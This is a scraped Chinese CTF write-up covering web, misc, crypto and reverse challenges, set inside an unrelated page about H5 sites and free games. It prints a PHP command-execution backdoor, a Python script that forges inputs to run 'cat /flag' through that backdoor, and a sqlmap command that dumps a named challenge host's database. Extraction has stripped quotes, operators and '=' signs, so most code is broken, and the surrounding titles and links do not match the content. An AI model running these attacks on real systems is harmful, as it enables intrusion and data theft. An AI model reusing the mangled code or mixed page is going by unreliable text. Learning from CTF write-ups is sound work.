当前位置: 首页 > news >正文

自建网站h5免费游戏不用登录直接玩

自建网站h5,免费游戏不用登录直接玩,东莞建工集团,网站建设维护网页设计web headach3 提示head#xff0c;抓包查看响应头#xff0c;得到flag flag值#xff1a;flag{You_Ar3_R3Ally_A_9ooD_d0ctor} 会赢吗 第一段#xff1a;源码里找到第一段flag#xff0c;ZmxhZ3tXQTB3 第二段#xff1a;分析可知需要在控制台调用revealFlag函数向服务…web headach3 提示head抓包查看响应头得到flag flag值flag{You_Ar3_R3Ally_A_9ooD_d0ctor} 会赢吗 第一段源码里找到第一段flagZmxhZ3tXQTB3 第二段分析可知需要在控制台调用revealFlag函数向服务器发送POST请求到 /api/flag/4cqu1siti0n得到第二段flag IV95NF9yM2Fs revealFlag(4cqu1siti0n); 第三段修改stateElement参数内容为解封点击按钮触发事件得到flagMXlfR3I0c1B document.getElementById(state).textContent 解封; 第四段用插件禁用js得到最后一段flagfSkpKcyF9 四段拼接起来base64解码得到flag flag值flag{WA0w!_y4_r3al1y_Gr4sP_JJJs!} 智械危机 题目提示robots.txt访问发现一个php界面 源码如下代码审计后门php ?phpfunction execute_cmd($cmd) {system($cmd);}function decrypt_request($cmd, $key) {$decoded_key base64_decode($key);$reversed_cmd ;for ($i strlen($cmd) - 1; $i 0; $i--) {$reversed_cmd . $cmd[$i];}$hashed_reversed_cmd md5($reversed_cmd);if ($hashed_reversed_cmd ! $decoded_key) {die(Invalid key);}$decrypted_cmd base64_decode($cmd);return $decrypted_cmd;}if (isset($_POST[cmd]) isset($_POST[key])) {execute_cmd(decrypt_request($_POST[cmd],$_POST[key])); } else {highlight_file(__FILE__); } ? 加密流程是post提交cmd和keybase解码key,cmd反转md5加密的反转cmd等于解码后的key,最后将cmd解码 按照给出的逻辑逆向加密一下得到flag脚本如下 import base64 import hashlibdef encode(cmd):encoded_cmd base64.b64encode(cmd.encode()).decode()reversed_cmd encoded_cmd[::-1]md5_cmd hashlib.md5(reversed_cmd.encode()).hexdigest()key base64.b64encode(md5_cmd.encode()).decode()return encoded_cmd, keycmd cat /flag encoded_cmd, key encode(cmd) print(fcmd{encoded_cmd}key{key}) flag值 flag{26f0ff62-c087-468c-821d-06f519977e22} 谢谢皮蛋 输入不同的id得到不同的结果可以确定是sql注入了 抓包可以看到参数被base64编码了刚好前两天学了sqlmap的使用直接试试sqlmap的tamper模块 使用--tamperbase64encode.py对输入的参数进行base64编码一键脱库得到flag python sqlmap.py http://eci-2zeb4o4fzbdh0lzlc9h2.cloudeci1.ichunqiu.com/ --dataid1 --tamperbase64encode.py --dump flag值flag{e60a762a-b153-41b5-b041-4f2b403414ab} Misc decompress 压缩包套娃一直解到最后一层将文件提取出来 提示给出了一个正则按照正则爆破密码一共五位第四位是数字 ^([a-z]){3}\d[a-z]$ 无所谓一共就五位数懒得写脚本了直接ARCHPR爆破得到密码 xtr4m解压得到flag flag值flag{U_R_th3_ma5ter_0f_dec0mpress} pleasingMusic 使用Audacity打开中间是一段摩斯密码提示倒着手动敲出来得到flag . --.. ..--.- -- --- .-. ... . ..--.- -.-. --- -.. . 摩斯解码得到flag flag值flag{ez_morse_code} WhereIsFlag 慢慢翻最后在环境变量里找到flag flag值flag{9e7a4f9f-ce98-4b87-8cd0-a61ca73083b3} Labyrinth 使用StegSlove翻到一张二维码扫码得到flag flag值flag{e33bb7a1-ac94-4d15-8ff7-fd8c88547b43} 兑换码 随波逐流爆破出高度得到flag flag值flag{La_vaguelette} Crypto xor 将flag1和flag2重新与key异或回去写解密脚本 from Crypto.Util.number import long_to_bytes from pwn import xorc1 8091799978721254458294926060841 c2 b;:\x1c1\x03*\x10\x11u; key bNew_Star_CTFkey_int int.from_bytes(key, big)flag1 long_to_bytes(c1 ^ key_int) flag2 xor(key, c2)print(flag1 flag2)# flag{0ops!_you_know_XOR!} flag值flag{0ops!_you_know_XOR!} Base cyberchef一把梭 flag值flag{BsE_0f_CrYpt0_N0W} 一眼秒了 在线网站分解n,然后是正常的rsa解密 from Crypto.Util.number import inverse, long_to_bytesc 48757373363225981717076130816529380470563968650367175499612268073517990636849798038662283440350470812898424299904371831068541394247432423751879457624606194334196130444478878533092854342610288522236409554286954091860638388043037601371807379269588474814290382239910358697485110591812060488786552463208464541069 p 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956044421 q 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956045093 e 65537 n p * qphi_n (p - 1) * (q - 1) d inverse(e, phi_n) m pow(c, d, n) flag long_to_bytes(m)print(flag.decode())# flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2} flag值flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2} Strange King 根据题目名称结合密文特征想到是凯撒偏移密码枚举偏移量为5时开头是f fnem{ZxsqkyZmNqxYbybZuslelg} 根据提示猜测可能是然后每个字符依次移位写脚本得到flag str_encrypted fnem{ZxsqkyZmNqxYbybZuslelg}str_decrypted for i, word in enumerate(str_encrypted):n -(i * 2)if word {:word_decrypted {elif word }:word_decrypted }elif word.islower():word_decrypted chr((ord(word) - ord(a) n) % 26 ord(a))elif word.isupper():word_decrypted chr((ord(word) - ord(A) n) % 26 ord(A))else:word_decrypted wordstr_decrypted word_decryptedprint(明文为, str_decrypted) flag值flag{PleaseDoNotStopLearing} Reverse begin 考察IDA的使用 找到flag1按a键将数据转化为可见字符 shiftF12找到字符串点开就能看到flag2和flag3 得到flag:flag{Mak3_aN_3Ff0rt_tO_5eArcH_F0r_th3_f14g_C0Rpse} base64 换表base64找到flag和base表 cyberchef解码得到flag flag值flag{y0u_kn0w_base64_well} Simple_encryption 简单的算法题AI写个脚本得到flag # 定义 buffer 的值 buffer bytearray([0x47, 0x95, 0x34, 0x48, 0xA4, 0x1C, 0x35, 0x88, 0x64, 0x16, 0x88,0x07, 0x14, 0x6A, 0x39, 0x12, 0xA2, 0x0A, 0x37, 0x5C, 0x07, 0x5A,0x56, 0x60, 0x12, 0x76, 0x25, 0x12, 0x8E, 0x28, 0x00, 0x00 # 最后两个0是填充 ])def reverse_transform(buffer):original bytearray(len(buffer))for j in range(len(buffer)):value buffer[j]if j % 3 2:# 反转 XOR 操作value ^ 0x55elif j % 3 1:# 反转加法操作value - 41else: # j % 3 0# 反转减法操作value 31# 确保值在合法的字节范围内value value 0xFF # 保证值在0到255之间original[j] valuereturn original# 逆向变换得到原始输入 original_input reverse_transform(buffer)# 将字节数组转换为可读的字符串 print(Original input should be:, original_input.decode(latin-1, errorsreplace))# flag{IT_15_R3Al1y_V3Ry-51Mp1e} flag值flag{IT_15_R3Al1y_V3Ry-51Mp1e}
http://www.w-s-a.com/news/514877/

相关文章:

  • 备案 网站商城网站设计公司排名
  • 汕头做网站优化公司seo软件简单易排名稳定
  • 如何做众筹网站微网站设计平台
  • 富平做网站十堰优化seo
  • 免费网站空间可访问wordpress弹窗注册代码
  • 东莞网站建设教程南京做代账会计在哪个网站上找
  • 网站开发好了 怎么发布wordpress数据库缓存插件
  • 工业电商网站怎么配色社交网站建设平台
  • 使用pycharm网站开发建一个网站需要什么条件
  • 网站建设哪些是需要外援的问题wordpress商品展示主题
  • 定制网站开发的目的是什么wordpress 增加按钮
  • 建设单位网站经费请示wordpress模板添加授权
  • 国外的电商网站有哪些为进一步加强校园网站建设
  • 专业集团门户网站建设企业微信商城和网站建设
  • 多少钱可以做网站找网络公司做推广费用
  • python php 网站开发网络营销师是干什么的
  • 网站建设设计方案动漫制作专业学校
  • 吴江区建设用地申报网站包装设计模板设计素材
  • 快速建站的公司wordpress 元数据定义
  • 网站seo分析工具网站标题用空格 逗号影响seo
  • 基金项目实验室信息网站建设wordpress文章新窗口打开
  • php网站开发就业前景做网站推荐源创网络
  • wordpress 8211西安网站优化维护
  • 泰安招聘网站有哪些wordpress 回复提醒
  • 网站服务器不稳定怎么打开网页企业营销策划心得体会
  • 自己做视频网站会不会追究版权企业商城网站建设方案
  • 烟台网站制作计划网站做seo的好处
  • 网站首页轮播官方网站下载拼多多
  • 罗庄区建设局网站自己做网站推广产品
  • 优秀flash网站欣赏苏州吴中区建设局网站